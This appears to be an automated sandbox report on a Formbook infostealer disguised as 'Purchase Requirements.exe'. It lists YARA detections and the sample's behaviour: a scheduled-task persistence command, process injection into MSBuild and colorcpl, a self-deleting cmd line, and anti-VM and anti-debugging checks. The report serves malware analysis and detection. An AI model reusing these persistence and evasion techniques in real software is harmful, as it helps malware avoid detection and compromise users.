Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0041B909 7_2_0041B909
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_00408C60 7_2_00408C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_00408C64 7_2_00408C64
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_00402D88 7_2_00402D88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_00402D90 7_2_00402D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0041CE65 7_2_0041CE65
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_00402FB0 7_2_00402FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013EF900 7_2_013EF900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01404120 7_2_01404120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014A1002 7_2_014A1002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013FB090 7_2_013FB090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0141EBB0 7_2_0141EBB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013E0D20 7_2_013E0D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_014B1D55 7_2_014B1D55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01412581 7_2_01412581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013FD5E0 7_2_013FD5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013F841F 7_2_013F841F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01406E30 7_2_01406E30
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044D1002 15_2_044D1002
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0442841F 15_2_0442841F
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0442B090 15_2_0442B090
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044E1D55 15_2_044E1D55
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0441F900 15_2_0441F900
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04410D20 15_2_04410D20
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04434120 15_2_04434120
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0442D5E0 15_2_0442D5E0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04436E30 15_2_04436E30
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0444EBB0 15_2_0444EBB0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_02AF2FB0 15_2_02AF2FB0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_02AF8C64 15_2_02AF8C64
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_02AF8C60 15_2_02AF8C60
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_02AF2D88 15_2_02AF2D88
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_02AF2D90 15_2_02AF2D90
Found potential string decryption / allocating functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 013EB150 appears 32 times
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 0441B150 appears 32 times
Sample file is different than original file name gathered from version info
Source: Purchase Requirements.exe, 00000000.00000002.704034282.0000000006E50000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemscorrc.dllT vs Purchase Requirements.exe
Source: Purchase Requirements.exe, 00000000.00000000.653671470.00000000005C0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameUIPermissionAttribu.exe6 vs Purchase Requirements.exe
Source: Purchase Requirements.exe, 00000000.00000002.693037255.0000000002851000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameConfigNodeType.dll> vs Purchase Requirements.exe
Source: Purchase Requirements.exe, 00000000.00000002.707699415.000000000E3A0000.00000002.00000001.sdmp Binary or memory string: originalfilename vs Purchase Requirements.exe
Source: Purchase Requirements.exe, 00000000.00000002.707699415.000000000E3A0000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs Purchase Requirements.exe
Source: Purchase Requirements.exe, 00000000.00000002.707276265.000000000E2A0000.00000002.00000001.sdmp Binary or memory string: System.OriginalFileName vs Purchase Requirements.exe
Source: Purchase Requirements.exe, 00000000.00000002.704651839.00000000070A0000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameStoreElement.dllB vs Purchase Requirements.exe
Source: Purchase Requirements.exe Binary or memory string: OriginalFilenameUIPermissionAttribu.exe6 vs Purchase Requirements.exe
Uses 32bit PE files
Source: Purchase Requirements.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Yara signature match
Source: 7.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.769728719.00000000010C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.769728719.00000000010C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.769097230.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.769097230.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.769766552.00000000010F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.769766552.00000000010F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.697236239.0000000003CE6000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.697236239.0000000003CE6000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.920407109.00000000041B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.920407109.00000000041B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.919573194.0000000000210000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.919573194.0000000000210000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.920195745.0000000002AF0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.920195745.0000000002AF0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Purchase Requirements.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: UCnSWpQKXBXg.exe.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: colorcpl.exe, 0000000F.00000002.921158643.0000000004927000.00000004.00000001.sdmp Binary or memory string: .configAMSBUILDDIRECTORYDELETERETRYCOUNTCMSBUILDDIRECTORYDELETRETRYTIMEOUT.sln
Source: colorcpl.exe, 0000000F.00000002.921158643.0000000004927000.00000004.00000001.sdmp Binary or memory string: MSBuild MyApp.sln /t:Rebuild /p:Configuration=Release
Source: colorcpl.exe, 0000000F.00000002.921158643.0000000004927000.00000004.00000001.sdmp Binary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb
Source: colorcpl.exe, 0000000F.00000002.921158643.0000000004927000.00000004.00000001.sdmp Binary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD
Source: colorcpl.exe, 0000000F.00000002.921158643.0000000004927000.00000004.00000001.sdmp Binary or memory string: *.sln
Source: colorcpl.exe, 0000000F.00000002.921158643.0000000004927000.00000004.00000001.sdmp Binary or memory string: MSBuild MyApp.csproj /t:Clean
Source: colorcpl.exe, 0000000F.00000002.921158643.0000000004927000.00000004.00000001.sdmp Binary or memory string: /ignoreprojectextensions:.sln
Source: colorcpl.exe, 0000000F.00000002.921158643.0000000004927000.00000004.00000001.sdmp Binary or memory string: MSBUILD : error MSB1048: Solution files cannot be debugged directly. Run MSBuild first with an environment variable MSBUILDEMITSOLUTION=1 to create a corresponding ".sln.metaproj" file. Then debug that.
Source: classification engine Classification label: mal100.troj.evad.winEXE@10/4@8/6
Source: C:\Users\user\Desktop\Purchase Requirements.exe File created: C:\Users\user\AppData\Roaming\UCnSWpQKXBXg.exe
Source: C:\Users\user\Desktop\Purchase Requirements.exe Mutant created: \Sessions\1\BaseNamedObjects\dearrPEcQuQxOghVdtiylVmw
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5572:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6992:120:WilError_01
Source: C:\Users\user\Desktop\Purchase Requirements.exe File created: C:\Users\user\AppData\Local\Temp\tmp47B.tmp
Source: Purchase Requirements.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Purchase Requirements.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\Purchase Requirements.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\Purchase Requirements.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Purchase Requirements.exe Virustotal: Detection: 33%
Source: Purchase Requirements.exe ReversingLabs: Detection: 33%
Source: C:\Users\user\Desktop\Purchase Requirements.exe File read: C:\Users\user\Desktop\Purchase Requirements.exe
Source: unknown Process created: C:\Users\user\Desktop\Purchase Requirements.exe 'C:\Users\user\Desktop\Purchase Requirements.exe'
Source: C:\Users\user\Desktop\Purchase Requirements.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\UCnSWpQKXBXg' /XML 'C:\Users\user\AppData\Local\Temp\tmp47B.tmp'
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Purchase Requirements.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe
Source: C:\Windows\SysWOW64\colorcpl.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Purchase Requirements.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
Source: C:\Users\user\Desktop\Purchase Requirements.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: Purchase Requirements.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Purchase Requirements.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Purchase Requirements.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: colorcpl.pdbGCTL source: MSBuild.exe, 00000007.00000002.769799256.0000000001129000.00000004.00000020.sdmp
Source: Binary string: colorcpl.pdb source: MSBuild.exe, 00000007.00000002.769799256.0000000001129000.00000004.00000020.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000008.00000000.710084049.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: colorcpl.exe, 0000000F.00000002.921158643.0000000004927000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: MSBuild.exe, 00000007.00000002.770164401.00000000013C0000.00000040.00000001.sdmp, colorcpl.exe, 0000000F.00000002.920589747.00000000043F0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: MSBuild.exe, colorcpl.exe
Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD source: colorcpl.exe, 0000000F.00000002.921158643.0000000004927000.00000004.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000008.00000000.710084049.0000000005A00000.00000002.00000001.sdmp

Data Obfuscation:

Binary contains a suspicious time stamp
Source: Purchase Requirements.exe Static PE information: 0xF489FAD9 [Sun Jan 3 18:15:53 2100 UTC]
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_004150FC push ss; iretd 7_2_00415117
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0041B3B5 push eax; ret 7_2_0041B408
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0041B46C push eax; ret 7_2_0041B472
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0041B402 push eax; ret 7_2_0041B408
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0041B40B push eax; ret 7_2_0041B472
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0041C57F push dword ptr [7A69614Dh]; ret 7_2_0041C5A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0041B6CC push 24CBA43Eh; ret 7_2_0041B6FD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0143D0D1 push ecx; ret 7_2_0143D0E4
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0446D0D1 push ecx; ret 15_2_0446D0E4
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_02B0BA3A push es; iretd 15_2_02B0BA3B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_02B0B3B5 push eax; ret 15_2_02B0B408
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_02B050FC push ss; iretd 15_2_02B05117
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_02B0B9C3 push eax; retf 15_2_02B0B9C4
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_02B0BEFB pushad ; iretd 15_2_02B0BEFF
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_02B0B6CC push 24CBA43Eh; ret 15_2_02B0B6FD
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_02B0B402 push eax; ret 15_2_02B0B408
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_02B0B40B push eax; ret 15_2_02B0B472
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_02B0B46C push eax; ret 15_2_02B0B472
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_02B0C57F push dword ptr [7A69614Dh]; ret 15_2_02B0C5A0
Source: initial sample Static PE information: section name: .text entropy: 7.37998351086

Persistence and Installation Behavior:

Drops PE files
Source: C:\Users\user\Desktop\Purchase Requirements.exe File created: C:\Users\user\AppData\Roaming\UCnSWpQKXBXg.exe

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\Purchase Requirements.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\UCnSWpQKXBXg' /XML 'C:\Users\user\AppData\Local\Temp\tmp47B.tmp'
Source: C:\Users\user\Desktop\Purchase Requirements.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\colorcpl.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match File source: 00000000.00000002.693278760.00000000029DB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Purchase Requirements.exe PID: 6556, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: Purchase Requirements.exe, 00000000.00000002.693278760.00000000029DB000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: Purchase Requirements.exe, 00000000.00000002.693278760.00000000029DB000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Tries to detect virtualization through RDTSC time measurements
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\colorcpl.exe RDTSC instruction interceptor: First address: 0000000002AF85E4 second address: 0000000002AF85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\colorcpl.exe RDTSC instruction interceptor: First address: 0000000002AF897E second address: 0000000002AF8984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_004088B0 rdtsc 7_2_004088B0
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\Purchase Requirements.exe Thread delayed: delay time: 922337203685477
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\Purchase Requirements.exe TID: 6560 Thread sleep time: -43837s >= -30000s
Source: C:\Users\user\Desktop\Purchase Requirements.exe TID: 6584 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 5788 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 7120 Thread sleep time: -30000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\colorcpl.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\Purchase Requirements.exe Thread delayed: delay time: 43837
Source: C:\Users\user\Desktop\Purchase Requirements.exe Thread delayed: delay time: 922337203685477
Source: explorer.exe, 00000008.00000000.709716593.00000000058C0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000008.00000000.715203231.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: Purchase Requirements.exe, 00000000.00000002.693278760.00000000029DB000.00000004.00000001.sdmp Binary or memory string: vmware
Source: Purchase Requirements.exe, 00000000.00000002.693278760.00000000029DB000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: Purchase Requirements.exe, 00000000.00000002.693278760.00000000029DB000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000008.00000000.710623846.0000000006650000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000008.00000000.715378228.000000000A716000.00000004.00000001.sdmp Binary or memory string: War&Prod_VMware_SATAa
Source: Purchase Requirements.exe, 00000000.00000002.693278760.00000000029DB000.00000004.00000001.sdmp Binary or memory string: VMWARE
Source: Purchase Requirements.exe, 00000000.00000002.693278760.00000000029DB000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000008.00000000.743758950.0000000004710000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 00000008.00000000.709716593.00000000058C0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000008.00000000.715378228.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 00000008.00000000.709716593.00000000058C0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000008.00000000.716003271.000000000A863000.00000004.00000001.sdmp Binary or memory string: SI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI
Source: Purchase Requirements.exe, 00000000.00000002.693278760.00000000029DB000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: Purchase Requirements.exe, 00000000.00000002.693278760.00000000029DB000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: explorer.exe, 00000008.00000000.715513412.000000000A784000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: Purchase Requirements.exe, 00000000.00000002.693278760.00000000029DB000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: explorer.exe, 00000008.00000000.709716593.00000000058C0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\Purchase Requirements.exe Process information queried: ProcessInformation

Anti Debugging:

Checks if the current process is being debugged
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\colorcpl.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_004088B0 rdtsc 7_2_004088B0
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_00409B20 LdrLoadDll, 7_2_00409B20
Contains functionality to read the PEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_0140B944 mov eax, dword ptr fs:[00000030h] 7_2_0140B944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013E9100 mov eax, dword ptr fs:[00000030h] 7_2_013E9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013EB171 mov eax, dword ptr fs:[00000030h] 7_2_013EB171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_013EC962 mov eax, dword ptr fs:[00000030h] 7_2_013EC962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01404120 mov eax, dword ptr fs:[00000030h] 7_2_01404120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 7_2_01404120 mov ecx, dword ptr fs:[00000030h] 7_2_01404120
